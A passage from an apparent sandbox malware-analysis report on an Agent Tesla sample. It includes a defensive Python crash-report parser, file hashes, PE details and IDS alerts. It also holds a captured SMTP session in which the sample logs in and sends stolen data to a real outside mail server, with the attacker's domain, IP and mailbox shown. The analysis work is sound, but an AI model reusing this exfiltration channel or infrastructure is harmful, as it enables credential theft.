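    """Triage view of a report: what crashed, when, and under which names."""
    summary = {
        "event_type": fields.get("EventType"),        # CLR20r3 = unhandled .NET exception
        "event_time_utc": filetime_to_datetime(fields["EventTime"]).isoformat(),
        "process_name": fields.get("NsAppName"),
        "original_filename": fields.get("OriginalFilename"),
    }
    # On-disk name differing from the version-resource name is a masquerading hint.
    summary["name_mismatch"] = (
        (summary["process_name"] or "").lower() != (summary["original_filename"] or "").lower()
    )
    summary.update(split_target_app_id(fields.get("TargetAppId", "")))
    return summary


# Constructed from the preview above; the 40-hex SHA-1 is a placeholder, not the real value.
SAMPLE_WER = (
    "Version=1\r\nEventType=CLR20r3\r\nEventTime=133585923876020195\r\n"
    "ReportType=2\r\nConsent=1\r\nUploadTime=133585923888711385\r\n"
    "ReportStatus=524384\r\nReportIdentifier=f546981a-4c8e-4734-9074-23d81c861b04\r\n"
    "Wow64Host=34404\r\nWow64Guest=332\r\n"
    "NsAppName=20240328-REV2.exe\r\nOriginalFilename=XZW.exe\r\n"
    "TargetAppId=W:0006951efb7d88bbfd13cc9b42c300efa6dd00000000"
    "!00000123456789abcdef0123456789abcdef01234567!20240328-REV2.exe\r\n"
).encode("utf-16")                          # str.encode('utf-16') prepends the BOM

if __name__ == "__main__":
    for key, value in summarize_wer(parse_wer(SAMPLE_WER)).items():
        print(f"{key:18} {value}")
```

The EventTime decodes to 2024-04-26 08:06:27 UTC, which lines up with the 10:06:33 (+02:00) WerFault entry in the timeline above and the minidump's own timestamp. Two other drops in this list deserve the opposite reading: the three 60-byte powershell.exe files whose preview is "# PowerShell test file to determine AppLocker lockdown mode" are written by PowerShell itself on every start to probe AppLocker policy, not by the sample, and the "fusion","GAC" file under the sample's own process has the layout of the CLR's assembly usage log, which is useful mainly as evidence that the binary ran managed code.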
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 08:06:28 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):356231
                                                Entropy (8bit):4.107414333063161
                                                Encrypted:false
                                                SSDEEP:3072:YNfHlYbLpmmEut8Iyf394uEqlg5J5LTgTLjphMCXAMbr:YhlYbwmbt8IyfN4IATgYCXAMb
                                                MD5:3A7EFCE410CFDC6C67C168409BA2CCC1
                                                SHA1:6DF2F2BADBE1B619E7E7E681E36A674CBD33C60E
                                                SHA-256:1FB7F4E52C4B05BF4FE53BCB2AD12990E806699E7DAC1E15F19C6CDC44189F4E
                                                SHA-512:39CFD46A87EAACB4B9305550C48959F90B99E52BE101F557D11699919C2356C0F398D436C712CC60E716BD685ECD3C2F61173F8FBBBED06452DD751D692522F6
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ........`+f........................t#..........$...\-.......0...g..........`.......8...........T............C...+...........-..........l/..............................................................................eJ.......0......GenuineIntel............T............`+f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8418
                                                Entropy (8bit):3.6965566573319495
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJIK6oh6YSGYSU9dMgmfZpXprjx89bSV7wsf0Amm:R6lXJV6oh6YrYSU9WgmfXYS9fZ
                                                MD5:722DDA7C42AD8A8EA0683C1DA0C67D34
                                                SHA1:28AFCFE6672EFCC3C37A8F2D80825390846DBB75
                                                SHA-256:17550E7BF9514888D6A7307E9F2DFF43B34C13954297CA87D9EFA333A599F9E8
                                                SHA-512:B9E09F1596F77F97ABFC72C1F35A3C7A37AB116BCEE5B1C4DD9B1184E7D43816B3F8F4E6F9B63DF3618A422D70FD36F6D2068E8101E720C97BADFED681C8CB04
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.4.0.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4751
                                                Entropy (8bit):4.474658268377554
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zstJg77aI97AWpW8VYXhYm8M4JjhFkNo+q8vaaNxq/qd:uIjfHI7t57VWAJ8NoK7O/qd
                                                MD5:2F27562D056D295F3AA59E71D231EC8A
                                                SHA1:135D6886222A921A75A7DBB9465785EAA700DAC2
                                                SHA-256:D4F1E4B0B11472449382DB1A2D439543E6E1D5B5ED939AA72CA5A6CA7FB1CBFD
                                                SHA-512:7588681EA7341EC8A70CFF4BC1DA63449D768135D669618798B67872E089E109328EA68E9B7C862E13B30CABE6E0E0F962ACB21A6E8B6BE71C79CE76B1155300
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Users\user\Desktop\20240328-REV2.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2232
                                                Entropy (8bit):5.379401388151058
                                                Encrypted:false
                                                SSDEEP:48:fWSU4xc4RTmaoUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:fLHxcIalLgZ2KRHWLOug8s
                                                MD5:6EFC00BBF21EB6D04A4F584932EE52E2
                                                SHA1:5046755E9D3154F66AAAE20B582B02A5A6ED51E5
                                                SHA-256:49923B1A86502BE5C3F109E07820A7AA03914E0263D247368792232A4A8E9F66
                                                SHA-512:8EA293396D7124BBD83E092D5320F5CFD2D7C0E2B2C70B2C1B3A4C202CC38D8466C6E71B7B10FE210D29DE5719AB17A04C0F2AD194688F6F1F60BE9FE50523FA
                                                Malicious:false
                                                Reputation:low
                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.372256882851346
                                                Encrypted:false
                                                SSDEEP:6144:/FVfpi6ceLP/9skLmb02yWWSPtaJG8nAge35OlMMhA2AX4WABlguNwiL:tV1UyWWI/glMM6kF7Wq
                                                MD5:9827F7439DF466540DD61B68F581F17A
                                                SHA1:1308B1F3C3357D497D72DAA5C31FE4A364A7526E
                                                SHA-256:0E55C6859E65ADA4B4A076E0200E64BE48B50640595D0F242DBB98B478D9B1E8
                                                SHA-512:368FE00A9A9CFE9A0EF2BB7239C2CCAFD22E2F0A4B7AFA50C9404C670C0EEDDB1F615048B64311B2DA7B34715FDAEFB6BEF2DF76F3E7E8F16F2A0ED420081CD4
                                                Malicious:false
                                                Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN.x.................................................................................................................................................................................................................................................................................................................................................X2n.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.939616453505201
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:20240328-REV2.exe
                                                File size:634'368 bytes
                                                MD5:ed1e2fd68e9de44ea4e01c7897f64411
                                                SHA1:a42eb4e6084ac91d1fad3ef9fe01d8d3e9db0c26
                                                SHA256:37109eb42fff729d1786ca4b676167f7acaa918a4abaf3bb465cfed6efa2b134
                                                SHA512:6bef9338609c2d307ace1620d8e8c8a7d2888448b04a259dbd54937aa92255f8805c696558177303e95ebcf74d041d995b392e6084a92f80789d7422d02f7bf1
                                                SSDEEP:12288:gYIPXjyEcoqe8OKZDOZqB8tMX4tVOiaatVSSDc1ow1rxEdex:gYIPuEtq/KoDX4XaaaSo1DUd
                                                TLSH:1BD412425EB92BA3D9BD9BF95031A50403F0AF567623E74C2FD160E72A61BC88741E73
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e{W...............0.............:.... ........@.. ....................... ............@................................
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x49c33a
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x81577B65 [Wed Oct 6 16:08:05 2038 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                xor eax, 35455354h
                                                xor dword ptr [edi+eax*2], esi
                                                dec eax
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ebx+4Ah], dl
                                                push ebx
                                                cmp byte ptr [eax+edi+34h], al
                                                inc ebx
                                                inc ebx
                                                xor al, 37h
                                                xor eax, 00000035h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9c2e6 | 0x4f | .text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9e000 | 0x57c | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa0000 | 0xc | .reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a504 | 0x70 | .text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x2000 | 0x9a360 | 0x9a400 | 37ff9b0485b6f7646a52456ff84b91ef | False | 0.9468398627431118 | data | 7.946644747446866 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc | 0x9e000 | 0x57c | 0x600 | 8fa9b427f921272c1d0ab0e00b6a7e9e | False | 0.4140625 | data | 4.0198470762349565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc | 0xa0000 | 0xc | 0x200 | 9da1352c6b37388f351c4c4e2e89eacc | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                RT_VERSION | 0x9e090 | 0x2ec | data | | | 0.4411764705882353
                                                RT_MANIFEST | 0x9e38c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                DLL | Import
                                                mscoree.dll | _CorExeMain
                                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                04/26/24-10:06:31.436750 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                04/26/24-10:06:31.436750 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                04/26/24-10:06:31.436814 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                04/26/24-10:06:31.436814 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                04/26/24-10:06:31.436814 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                04/26/24-10:06:31.436814 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Apr 26, 2024 10:06:29.658147097 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:06:29.854377031 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:29.854453087 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:06:30.143410921 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:30.144125938 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:06:30.340574026 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:30.341639042 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:06:30.538235903 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:30.539256096 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:06:30.775567055 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:30.833426952 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:30.833636999 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:06:31.029897928 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:31.030000925 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:31.030154943 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:06:31.239109039 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:31.239260912 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:06:31.435554028 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:31.435638905 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:31.436749935 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:06:31.436814070 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:06:31.436851025 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:06:31.436882973 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:06:31.633367062 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:31.633380890 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:31.634105921 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:06:31.685513973 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:08:09.311119080 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:08:09.548603058 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:08:09.709059954 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Apr 26, 2024 10:08:09.709230900 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:08:09.709325075 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115
                                                Apr 26, 2024 10:08:09.906341076 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Apr 26, 2024 10:06:29.299489975 CEST | 60173 | 53 | 192.168.2.8 | 1.1.1.1
                                                Apr 26, 2024 10:06:29.646856070 CEST | 53 | 60173 | 1.1.1.1 | 192.168.2.8
                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                Apr 26, 2024 10:06:29.299489975 CEST | 192.168.2.8 | 1.1.1.1 | 0xb564 | Standard query (0) | mail.mbarieservicesltd.com | A (IP address) | IN (0x0001) | false
                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                Apr 26, 2024 10:06:29.646856070 CEST | 1.1.1.1 | 192.168.2.8 | 0xb564 | No error (0) | mail.mbarieservicesltd.com | mbarieservicesltd.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                Apr 26, 2024 10:06:29.646856070 CEST | 1.1.1.1 | 192.168.2.8 | 0xb564 | No error (0) | mbarieservicesltd.com | | 199.79.62.115 | A (IP address) | IN (0x0001) | false
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                Apr 26, 2024 10:06:30.143410921 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8 | 220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 13:36:30 +0530
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Apr 26, 2024 10:06:30.144125938 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115 | EHLO 651689
                                                Apr 26, 2024 10:06:30.340574026 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8 | 250-md-54.webhostbox.net Hello 651689 [102.129.152.220]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-PIPECONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Apr 26, 2024 10:06:30.341639042 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115 | AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                Apr 26, 2024 10:06:30.538235903 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8 | 334 UGFzc3dvcmQ6
                                                Apr 26, 2024 10:06:30.833426952 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8 | 235 Authentication succeeded
                                                Apr 26, 2024 10:06:30.833636999 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115 | MAIL FROM:<saless@mbarieservicesltd.com>
                                                Apr 26, 2024 10:06:31.030000925 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8 | 250 OK
                                                Apr 26, 2024 10:06:31.030154943 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115 | RCPT TO:<iinfo@mbarieservicesltd.com>
                                                Apr 26, 2024 10:06:31.239109039 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8 | 250 Accepted
                                                Apr 26, 2024 10:06:31.239260912 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115 | DATA
                                                Apr 26, 2024 10:06:31.435638905 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8 | 354 Enter message, ending with "." on a line by itself
                                                Apr 26, 2024 10:06:31.436882973 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115 | .
                                                Apr 26, 2024 10:06:31.634105921 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8 | 250 OK id=1s0GbH-004EjF-15
                                                Apr 26, 2024 10:08:09.311119080 CEST | 49711 | 587 | 192.168.2.8 | 199.79.62.115 | QUIT
                                                Apr 26, 2024 10:08:09.709059954 CEST | 587 | 49711 | 199.79.62.115 | 192.168.2.8 | 221 md-54.webhostbox.net closing connection

                                                Target ID:1
                                                Start time:10:06:25
                                                Start date:26/04/2024
                                                Path:C:\Users\user\Desktop\20240328-REV2.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\20240328-REV2.exe"
